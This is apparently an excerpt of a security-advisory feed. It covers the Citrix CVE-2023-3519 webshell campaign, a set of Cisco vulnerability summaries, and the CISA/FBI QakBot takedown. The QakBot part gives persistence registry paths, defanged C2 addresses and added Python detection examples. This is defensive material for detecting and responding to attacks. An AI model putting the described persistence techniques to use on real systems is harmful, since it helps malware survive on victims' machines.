This Cybersecurity Advisory has been updated with new tactics, techniques, and procedures (TTPs) as well as indicators of compromise (IOCs) received from an additional victim and trusted third parties.


Update End

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to warn network defenders about exploitation of CVE-2023-3519, an unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway. In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization's non-production environment NetScaler ADC appliance. The webshell enabled the actors to perform discovery on the victim's active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network-segmentation controls for the appliance blocked movement.


The victim organization identified the compromise and reported the activity to CISA and Citrix. Citrix released a patch for this vulnerability on July 18, 2023.


This advisory provides TTPs and detection methods shared with CISA by the victim. CISA encourages critical infrastructure organizations to use the detection guidance included in this advisory for help with determining system compromise. If potential compromise is detected, organizations should apply the incident response recommendations provided in this CSA. If no compromise is detected, organizations should immediately apply patches provided by Citrix.


Download the PDF version of this report: AA23-201A Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells (PDF, 565.45 KB): https://www.cisa.gov/sites/default/files/2023-09/aa23-201a_csa_threat_actors_exploiting_citrix-cve-2023-3519_to_implant_webshells.pdf

Update September 6, 2023:

In August 2023, CISA received TTPs and IOCs from an additional victim and trusted third parties. This CSA has been updated with the TTPs and IOCs to assist administrators with detecting and responding to this activity.


For a downloadable list of IOCs, see the following XML and JSON files:

AA23-201A STIX XML (XML, 43.13 KB)
https://www.cisa.gov/sites/default/files/2023-09/AA23-201A.stix_.xml

Update End

#6
Cisco Unified Communications Products Privilege Escalation Vulnerability

A vulnerability in Cisco Emergency Responder, Cisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), and Cisco Unity Connection could allow an authenticated, remote attacker to elevate privileges to root on an affected device.


This vulnerability exists because the application does not properly restrict the files that are being used for upgrades. An attacker could exploit this vulnerability by providing a crafted upgrade file. A successful exploit could allow the attacker to elevate privileges to root. To exploit this vulnerability, the attacker must have valid platform administrator credentials on an affected device.



Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-priv-esc-D8Bky5eg



     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20266
Source: Cisco Unified Communications Products Privilege Escalation Vulnerability
#7
Identification and Disruption of QakBot Infrastructure

SUMMARY


The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) to disseminate QakBot infrastructure indicators of compromise (IOCs) identified through FBI investigations as of August 2023. On August 25, FBI and international partners executed a coordinated operation to disrupt QakBot infrastructure worldwide. Disruption operations targeting QakBot infrastructure resulted in the botnet takeover, which severed the connection between victim computers and QakBot command and control (C2) servers. The FBI is working closely with industry partners to share information about the malware to maximize detection, remediation, and prevention measures for network defenders.


CISA and FBI encourage organizations to implement the recommendations in the Mitigations section to reduce the likelihood of QakBot-related activity and promote identification of QakBot-facilitated ransomware and malware infections. Note: The disruption of QakBot infrastructure does not mitigate other previously installed malware or ransomware on victim computers. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to a local FBI Field Office or CISA at cisa.gov/report.


Download the PDF version of this report:

AA23-242A Identification and Disruption of QakBot Infrastructure (PDF, 570.50 KB)


For a downloadable copy of IOCs, see:

AA23-242A STIX XML (XML, 51.62 KB)
AA23-242A STIX JSON (JSON, 43.12 KB)


TECHNICAL DETAILS


Overview


QakBot—also known as Qbot, Quackbot, Pinkslipbot, and TA570—is responsible for thousands of malware infections globally. QakBot has been the precursor to a significant amount of computer intrusions, to include ransomware and the compromise of user accounts within the Financial Sector. In existence since at least 2008, QakBot feeds into the global cybercriminal supply chain and has deep-rooted connections to the criminal ecosystem. QakBot was originally used as a banking trojan to steal banking credentials for account compromise; in most cases, it was delivered via phishing campaigns containing malicious attachments or links to download the malware, which would reside in memory once on the victim network.


Since its inception as a banking trojan, QakBot has evolved into a multi-purpose botnet and malware variant that provides threat actors with a wide range of capabilities, including reconnaissance, lateral movement, data gathering and exfiltration, and delivery of other malicious payloads, including ransomware, on affected devices. QakBot has maintained persistence in the digital environment because of its modular nature. Access to QakBot-affected (victim) devices via compromised credentials is often sold to further the goals of the threat actor who delivered QakBot.


QakBot and affiliated variants have targeted the United States and other global infrastructures, including the Financial Services, Emergency Services, and Commercial Facilities Sectors, and the Election Infrastructure Subsector. FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood of QakBot-related infections and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other previously installed malware or ransomware on victim computers. If a potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA and FBI.


QakBot Infrastructure


QakBot's modular structure allows for various malicious features, including process and web injection, victim network enumeration and credential stealing, and the delivery of follow-on payloads such as Cobalt Strike[1], Brute Ratel, and other malware. QakBot infections are particularly known to precede the deployment of human-operated ransomware, including Conti[2], ProLock[3], Egregor[4], REvil[5], MegaCortex[6], Black Basta[7], Royal[8], and PwndLocker.


Historically, QakBot's C2 infrastructure relied heavily on using hosting providers for its own infrastructure and malicious activity. These providers lease servers to malicious threat actors, ignore abuse complaints, and do not cooperate with law enforcement. At any given time, thousands of victim computers running Microsoft Windows were infected with QakBot—the botnet was controlled through three tiers of C2 servers.





Figure 1: QakBot's Tiered C2 Servers (image not reproduced)
The first tier of C2 servers includes a subset of thousands of bots selected by QakBot administrators, which are promoted to Tier 1 "supernodes" by downloading an additional software module. These supernodes communicate with the victim computers to relay commands and communications between the upstream C2 servers and the infected computers. As of mid-June 2023, 853 supernodes have been identified in 63 countries, which were active that same month. Supernodes have been observed frequently changing, which assists QakBot in evading detection by network defenders. Each bot has been observed communicating with a set of Tier 1 supernodes to relay communications to the Tier 2 C2 servers, serving as proxies to conceal the main C2 server. The Tier 3 server controls all of the bots.


Indicators of Compromise


FBI has observed the following threat actor tactics, techniques, and procedures (TTPs) in association with QakBot infections:


  1. QakBot sets up persistence via the Registry Run Key as needed. It will delete this key when running and set it back up before computer restart: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

  2. QakBot will also write its binary back to disk to maintain persistence in the following folder: C:\Users\\AppData\Roaming\Microsoft\\

  3. QakBot will write an encrypted registry configuration detailing information about the bot to the following registry key: HKEY_CURRENT_USER\Software\Microsoft\
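The three persistence behaviours above can be turned into a check over registry telemetry rather than a one-off registry read. The following Python is an added example, not code from the CISA/FBI advisory. It assumes Sysmon-style registry events (Event ID 13 SetValue and Event ID 12 DeleteValue, carrying Sysmon's TargetObject, Details and Image fields, with HKCU paths written as HKU\<SID>\...) exported as dicts; the records, the user name "alice", the value name "Uvmxbq" and the file name "examplesvc.exe" are constructed placeholders, not known QakBot artifacts. Because the bot deletes its Run value while it is running and re-creates it before shutdown, a point-in-time registry or Autoruns snapshot can come up clean; the last function replays the event stream to a chosen time to show that gap.

```python
import re
from collections import defaultdict

# Sysmon writes HKCU keys under HKU\<SID>\...; only the Run-key tail matters here.
RUN_VALUE_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\([^\\]+)$", re.IGNORECASE)
# Advisory item 2: the bot rewrites its binary under AppData\Roaming\Microsoft\.
ROAMING_MS_RE = re.compile(r"\\AppData\\Roaming\\Microsoft\\", re.IGNORECASE)

# Constructed Sysmon-style records (not real telemetry). "alice", "Uvmxbq" and
# "examplesvc.exe" are placeholders, not names taken from real QakBot samples.
BOT = r"C:\Users\alice\AppData\Roaming\Microsoft\Uvmxbq\examplesvc.exe"
ONEDRIVE = r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
RUN = r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_EVENTS = [
    # bot starts at logon and registers itself (item 1)
    {"EventID": 13, "EventType": "SetValue", "UtcTime": "2023-08-21 08:00:01",
     "Image": BOT, "TargetObject": RUN + r"\Uvmxbq", "Details": BOT},
    # ...then deletes the value while it is running (item 1)
    {"EventID": 12, "EventType": "DeleteValue", "UtcTime": "2023-08-21 08:00:04",
     "Image": BOT, "TargetObject": RUN + r"\Uvmxbq"},
    # benign: OneDrive keeps its own Run value, but under AppData\Local
    {"EventID": 13, "EventType": "SetValue", "UtcTime": "2023-08-21 09:15:00",
     "Image": ONEDRIVE, "TargetObject": RUN + r"\OneDrive",
     "Details": ONEDRIVE + " /background"},
    # ...and sets it back before the host restarts (item 1)
    {"EventID": 13, "EventType": "SetValue", "UtcTime": "2023-08-21 17:30:12",
     "Image": BOT, "TargetObject": RUN + r"\Uvmxbq", "Details": BOT},
]


def run_value_name(target_object):
    """Value name if TargetObject is a per-user Run value, else None."""
    m = RUN_VALUE_RE.search(target_object)
    return m.group(1) if m else None


def suspicious_run_values(events):
    """Run values whose command, or the process writing them, lives under AppData\\Roaming\\Microsoft\\."""
    hits = []
    for ev in events:
        if ev["EventID"] != 13:
            continue
        name = run_value_name(ev["TargetObject"])
        if not name:
            continue
        if ROAMING_MS_RE.search(ev.get("Details", "")) or ROAMING_MS_RE.search(ev["Image"]):
            hits.append((ev["UtcTime"], name, ev.get("Details", "")))
    return hits


def toggled_run_values(events):
    """Values that were set, deleted and set again: the hide-while-running pattern."""
    history = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        name = run_value_name(ev["TargetObject"])
        if name:
            history[name].append(ev["EventType"])
    toggled = []
    for name, seq in history.items():
        for i, kind in enumerate(seq):
            if kind == "DeleteValue" and "SetValue" in seq[:i] and "SetValue" in seq[i + 1:]:
                toggled.append(name)
                break
    return sorted(toggled)


def run_values_at(events, when):
    """Replay the stream: what a registry snapshot taken at `when` would have shown."""
    state = {}
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        if ev["UtcTime"] > when:
            break
        name = run_value_name(ev["TargetObject"])
        if not name:
            continue
        if ev["EventType"] == "SetValue":
            state[name] = ev["Details"]
        elif ev["EventType"] == "DeleteValue":
            state.pop(name, None)
    return state


if __name__ == "__main__":
    print("suspicious:", suspicious_run_values(SAMPLE_EVENTS))
    print("toggled:", toggled_run_values(SAMPLE_EVENTS))
    print("snapshot at noon:", run_values_at(SAMPLE_EVENTS, "2023-08-21 12:00:00"))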

In addition, the below IP addresses were assessed to have obtained access to victim computers. Organizations are encouraged to review any connections with these IP addresses, which could potentially indicate a QakBot and/or follow-on malware infection.


Disclaimer: The below IP addresses are assessed to be inactive as of August 29, 2023. Several of these observed IP addresses were first observed as early as 2020, although most date from 2022 or 2023, and have been historically linked to QakBot. FBI and CISA recommend these IP addresses be investigated or vetted by organizations prior to taking action, such as blocking.


Table 1: IPs Affiliated with QakBot Infections

IP Address            First Seen
85.14.243[.]111       April 2020
51.38.62[.]181        April 2021
51.38.62[.]182        December 2021
185.4.67[.]6          April 2022
62.141.42[.]36        April 2022
87.117.247[.]41       May 2022
89.163.212[.]111      May 2022
193.29.187[.]57       May 2022
193.201.9[.]93        June 2022
94.198.50[.]147       August 2022
94.198.50[.]210       August 2022
188.127.243[.]130     September 2022
188.127.243[.]133     September 2022
94.198.51[.]202       October 2022
188.127.242[.]119     November 2022
188.127.242[.]178     November 2022
87.117.247[.]41       December 2022
190.2.143[.]38        December 2022
51.161.202[.]232      January 2023
51.195.49[.]228       January 2023
188.127.243[.]148     January 2023
23.236.181[.]102      Unknown
45.84.224[.]23        Unknown
46.151.30[.]109       Unknown
94.103.85[.]86        Unknown
94.198.53[.]17        Unknown
95.211.95[.]14        Unknown
95.211.172[.]6        Unknown
95.211.172[.]7        Unknown
95.211.172[.]86       Unknown
95.211.172[.]108      Unknown
95.211.172[.]109      Unknown
95.211.198[.]177      Unknown
95.211.250[.]97       Unknown
95.211.250[.]98       Unknown
95.211.250[.]117      Unknown
185.81.114[.]188      Unknown
188.127.243[.]145     Unknown
188.127.243[.]147     Unknown
188.127.243[.]193     Unknown
188.241.58[.]140      Unknown
193.29.187[.]41       Unknown


Organizations are also encouraged to review the Qbot/QakBot Malware presentation from the U.S. Department of Health & Human Services Cybersecurity Program for additional information.
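As an added example, not part of the CISA/FBI advisory, the following Python matches the defanged addresses of Table 1 against firewall-style log lines. The IOC subset (five entries; the advisory's STIX files carry the full list), the log format and the sample lines are all constructed here. Two details matter in practice: the "[.]" defanging has to be reversed and validated before matching, and the match must be on whole addresses, since a plain substring test would report 185.14.243.111 as a hit for 85.14.243.111. In keeping with the disclaimer above, the output is a triage list of internal hosts that contacted a listed address, not a block list.

```python
import ipaddress
import re

# Subset of the defanged addresses from Table 1, with the first-seen month;
# the advisory's STIX XML/JSON files carry the full list.
QAKBOT_IOCS = {
    "85.14.243[.]111": "April 2020",
    "51.38.62[.]181": "April 2021",
    "188.127.243[.]130": "September 2022",
    "95.211.172[.]6": "Unknown",
    "193.29.187[.]41": "Unknown",
}

# Constructed firewall-style log lines, not real traffic. The last line is a
# deliberate near-miss: 185.14.243.111 contains the IOC 85.14.243.111 as a
# substring, which a naive `ioc in line` check would report as a hit.
SAMPLE_LOG = [
    "2023-08-20T10:01:02Z fw1 allow 10.0.5.23:51234 -> 85.14.243.111:443 tcp",
    "2023-08-20T10:01:05Z fw1 allow 10.0.5.23:51240 -> 142.250.72.14:443 tcp",
    "2023-08-20T10:03:17Z fw1 allow 10.0.7.8:49822 -> 95.211.172.6:2222 tcp",
    "2023-08-20T10:03:19Z fw1 allow 10.0.9.4:49823 -> 185.14.243.111:443 tcp",
]

# \b on both ends keeps a longer address from matching a listed one as a substring.
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# source:port -> destination:port, as used in the constructed log format above.
FLOW_RE = re.compile(r"(\S+):\d+ -> (\S+):\d+")


def refang(ioc):
    """Turn 85.14.243[.]111 into 85.14.243.111, rejecting anything that is not an address."""
    addr = ioc.replace("[.]", ".")
    ipaddress.ip_address(addr)  # raises ValueError on a malformed IOC
    return addr


def match_log_lines(lines, iocs=QAKBOT_IOCS):
    """(line_no, ip, first_seen) for each line containing a listed address as a whole token."""
    table = {refang(k): v for k, v in iocs.items()}
    hits = []
    for n, line in enumerate(lines, start=1):
        for ip in IPV4_RE.findall(line):
            if ip in table:
                hits.append((n, ip, table[ip]))
    return hits


def hosts_to_triage(lines, iocs=QAKBOT_IOCS):
    """Internal sources that talked to a listed address: the hosts to examine first."""
    table = {refang(k) for k in iocs}
    sources = set()
    for line in lines:
        m = FLOW_RE.search(line)
        if m and m.group(2) in table:
            sources.add(m.group(1))
    return sorted(sources)


if __name__ == "__main__":
    for n, ip, seen in match_log_lines(SAMPLE_LOG):
        print(f"line {n}: {ip} (first seen {seen})")
    print("triage:", hosts_to_triage(SAMPLE_LOG))
```

On the constructed lines this reports lines 1 and 3 and produces 10.0.5.23 and 10.0.7.8 as the hosts to look at; the near-miss on line 4 is not reported. Swap QAKBOT_IOCS for the full STIX list and FLOW_RE for your own log layout.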


MITRE ATT&CK TECHNIQUES


For detailed associated software descriptions, tactics used, and groups that have been observed using this software, see MITRE ATT&CK's page on QakBot.[9]


MITIGATIONS


Note: For situational awareness, the following SHA-256 hash is associated with FBI's QakBot uninstaller: 7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117


CISA and FBI recommend network defenders apply the following mitigations to reduce the likelihood of QakBot-related activity and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other already-installed malware or ransomware on victim computers. Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.


Best Practice Mitigation Recommendations


  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud) [CPG 2.O, 2.R, 5.A].

  • Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST's standards when developing and managing password policies [CPG 2.B]. This includes:
    • Use longer passwords consisting of at least 8 characters and no more than 64 characters in length;

    • Store passwords in hashed format using industry-recognized password managers;

    • Add password user "salts" to shared login credentials;

    • Avoid reusing passwords;

    • Implement multiple failed login attempt account lockouts;

    • Disable password "hints";

    • Refrain from requiring password changes more frequently than once per year.
      Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password "patterns" cyber criminals can easily decipher.

    • Require administrator credentials to install software.


  • Use phishing-resistant multi-factor authentication (MFA) [CPG 2.H] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services as possible—particularly for webmail and VPNs—for accounts that access critical systems and privileged accounts that manage backups. MFA should also be used for remote logins. For additional guidance on secure MFA configurations, visit cisa.gov/MFA and CISA's Implementing Phishing-Resistant MFA Factsheet.

  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities of internet-facing systems [CPG 1.E]. CISA offers a range of services at no cost, including scanning and testing to help organizations reduce exposure to threats via mitigating attack vectors. Specifically, Cyber Hygiene services can help provide a second-set of eyes on organizations' internet-accessible assets. Organizations can email vulnerability@cisa.dhs.gov with the subject line, "Requesting Cyber Hygiene Services" to get started.

  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks to restrict adversary lateral movement [CPG 2.F].

  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated malware with a network monitoring tool. To aid in detecting the malware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].

  • Install, regularly update, and enable real time detection for antivirus software on all hosts.

  • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.

  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.D, 2.E].

  • Disable unused ports [CPG 2.V, 2.W, 2.X].

  • Consider adding an email banner to emails received from outside your organization.

  • Disable hyperlinks in received emails.

  • Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task [CPG 2.E].

  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.

  • Perform regular secure system backups and create known good copies of all device configurations for repairs and/or restoration. Store copies off-network in physically secure locations and test regularly [CPG 2.R].

  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization's data infrastructure.

Ransomware Guidance


  • CISA.gov/stopransomware is a whole-of-government resource that serves as one central location for ransomware resources and alerts.

  • CISA, FBI, the National Security Agency (NSA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) published an updated version of the #StopRansomware Guide, as ransomware actors have accelerated their tactics and techniques since its initial release in 2020.

  • CISA has released a new module in its Cyber Security Evaluation Tool (CSET), the Ransomware Readiness Assessment (RRA). CSET is a desktop software tool that guides network defenders through a step-by-step process to evaluate cybersecurity practices on their networks.

VALIDATE SECURITY CONTROLS


In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.


To get started:


  1. Select an ATT&CK technique described in this advisory (see MITRE ATT&CK's page on QakBot).[9]

  2. Align your security technologies against the technique.

  3. Test your technologies against the technique.

  4. Analyze your detection and prevention technologies performance.

  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.

  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques.


REPORTING


FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with QakBot-affiliated actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at cisa.gov/report.


RESOURCES


REFERENCES


  1. MITRE: Cobalt Strike

  2. MITRE: Conti

  3. MITRE: ProLock

  4. MITRE: Egregor

  5. MITRE: REvil

  6. MITRE: MegaCortex

  7. MITRE: Black Basta

  8. MITRE: Royal

  9. MITRE: QakBot

DISCLAIMER


The information in this report is being provided "as is" for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.


VERSION HISTORY


August 30, 2023: Initial version.


Source: Identification and Disruption of QakBot Infrastructure
#8
Cisco NX-OS Software TACACS+ or RADIUS Remote Authentication Directed Request Denial of Service Vulnerability

A vulnerability in TACACS+ and RADIUS remote authentication for Cisco NX-OS Software could allow an unauthenticated, local attacker to cause an affected device to unexpectedly reload. 


This vulnerability is due to incorrect input validation when processing an authentication attempt if the directed request option is enabled for TACACS+ or RADIUS. An attacker could exploit this vulnerability by entering a crafted string at the login prompt of an affected device. A successful exploit could allow the attacker to cause the affected device to unexpectedly reload, resulting in a denial of service (DoS) condition. 


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-remoteauth-dos-XB6pv74m



This advisory is part of the August 2023 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2023 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication.




     
         
Security Impact Rating:  High
   
   
       
CVE: CVE-2023-20168
Source: Cisco NX-OS Software TACACS+ or RADIUS Remote Authentication Directed Request Denial of Service Vulnerability
#9
Cisco Nexus 3000 and 9000 Series Switches SFTP Server File Access Vulnerability

A vulnerability in the SFTP server implementation for Cisco Nexus 3000 Series Switches and 9000 Series Switches in standalone NX-OS mode could allow an authenticated, remote attacker to download or overwrite files from the underlying operating system of an affected device. 


This vulnerability is due to a logic error when verifying the user role when an SFTP connection is opened to an affected device. An attacker could exploit this vulnerability by connecting and authenticating via SFTP as a valid, non-administrator user. A successful exploit could allow the attacker to read or overwrite files from the underlying operating system with the privileges of the authenticated user.


Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-sftp-xVAp5Hfd



This advisory is part of the August 2023 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2023 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication.




     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20115
Source: Cisco Nexus 3000 and 9000 Series Switches SFTP Server File Access Vulnerability
#10
Cisco Application Policy Infrastructure Controller Unauthorized Policy Actions Vulnerability

A vulnerability in the restricted security domain implementation of Cisco Application Policy Infrastructure Controller (APIC) could allow an authenticated, remote attacker to read, modify, or delete non-tenant policies (for example, access policies) created by users associated with a different security domain on an affected system.


This vulnerability is due to improper access control when restricted security domains are used to implement multi-tenancy for policies outside the tenant boundaries. An attacker with a valid user account associated with a restricted security domain could exploit this vulnerability. A successful exploit could allow the attacker to read, modify, or delete policies created by users associated with a different security domain. Exploitation is not possible for policies under tenants that an attacker has no authorization to access.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apic-uapa-F4TAShk



     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20230
Source: Cisco Application Policy Infrastructure Controller Unauthorized Policy Actions Vulnerability
#11
Cisco Nexus 3000 and 9000 Series Switches IS-IS Protocol Denial of Service Vulnerability

A vulnerability in the Intermediate System-to-Intermediate System (IS-IS) protocol of Cisco NX-OS Software for the Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, adjacent attacker to cause the IS-IS process to unexpectedly restart, which could cause an affected device to reload.


This vulnerability is due to insufficient input validation when parsing an ingress IS-IS packet. An attacker could exploit this vulnerability by sending a crafted IS-IS packet to an affected device. A successful exploit could allow the attacker to cause a denial of service (DoS) condition due to the unexpected restart of the IS-IS process, which could cause the affected device to reload.


Note: The IS-IS protocol is a routing protocol. To exploit this vulnerability, an attacker must be Layer 2 adjacent to the affected device.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-n3_9k-isis-dos-FTCXB4Vb



This advisory is part of the August 2023 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2023 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication.




     
         
Security Impact Rating:  High
   
   
       
CVE: CVE-2023-20169
Source: Cisco Nexus 3000 and 9000 Series Switches IS-IS Protocol Denial of Service Vulnerability
#12
Cisco FXOS Software Arbitrary File Write Vulnerability

A vulnerability in the CLI of Cisco FXOS Software could allow an authenticated, local attacker to create a file or overwrite any file on the filesystem of an affected device, including system files.


The vulnerability occurs because there is no validation of parameters when a specific CLI command is used. An attacker could exploit this vulnerability by authenticating to an affected device and using the command at the CLI. A successful exploit could allow the attacker to overwrite any file on the disk of the affected device, including system files. The attacker must have valid administrative credentials on the affected device to exploit this vulnerability.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fxos-arbitrary-file-BLk6YupL



This advisory is part of the August 2023 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2023 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication.




     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20234
Source: Cisco FXOS Software Arbitrary File Write Vulnerability
#13
Cisco Firepower 4100 Series, Firepower 9300 Security Appliances, and UCS 6300 Series Fabric Interconnects SNMP Denial of Service Vulnerability

A vulnerability in the Simple Network Management Protocol (SNMP) service of Cisco FXOS Software for Firepower 4100 Series and Firepower 9300 Security Appliances and of Cisco UCS 6300 Series Fabric Interconnects could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.


This vulnerability is due to the improper handling of specific SNMP requests. An attacker could exploit this vulnerability by sending a crafted SNMP request to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.


Note: This vulnerability affects all supported SNMP versions. To exploit this vulnerability through SNMPv2c or earlier, an attacker must know the SNMP community string that is configured on an affected device. To exploit this vulnerability through SNMPv3, the attacker must have valid credentials for an SNMP user who is configured on the affected device.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fp-ucsfi-snmp-dos-qtv69NAO



This advisory is part of the August 2023 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2023 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication.




     
         
Security Impact Rating:  High
   
   
       
CVE: CVE-2023-20200
Source: Cisco Firepower 4100 Series, Firepower 9300 Security Appliances, and UCS 6300 Series Fabric Interconnects SNMP Denial of Service Vulnerability
#14
Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation Vulnerability

A vulnerability in the CLI of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, local attacker to elevate privileges on an affected device.


This vulnerability is due to insufficient input validation by the operating system CLI. An attacker could exploit this vulnerability by issuing certain commands using sudo. A successful exploit could allow the attacker to view arbitrary files as root on the underlying operating system. The attacker must have valid credentials on the affected device.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-te-va-priv-esc-PUdgrx8E



     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20217
Source: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation Vulnerability
#15
Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation Vulnerability

A vulnerability in the CLI of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, local attacker to elevate privileges to root on an affected device.


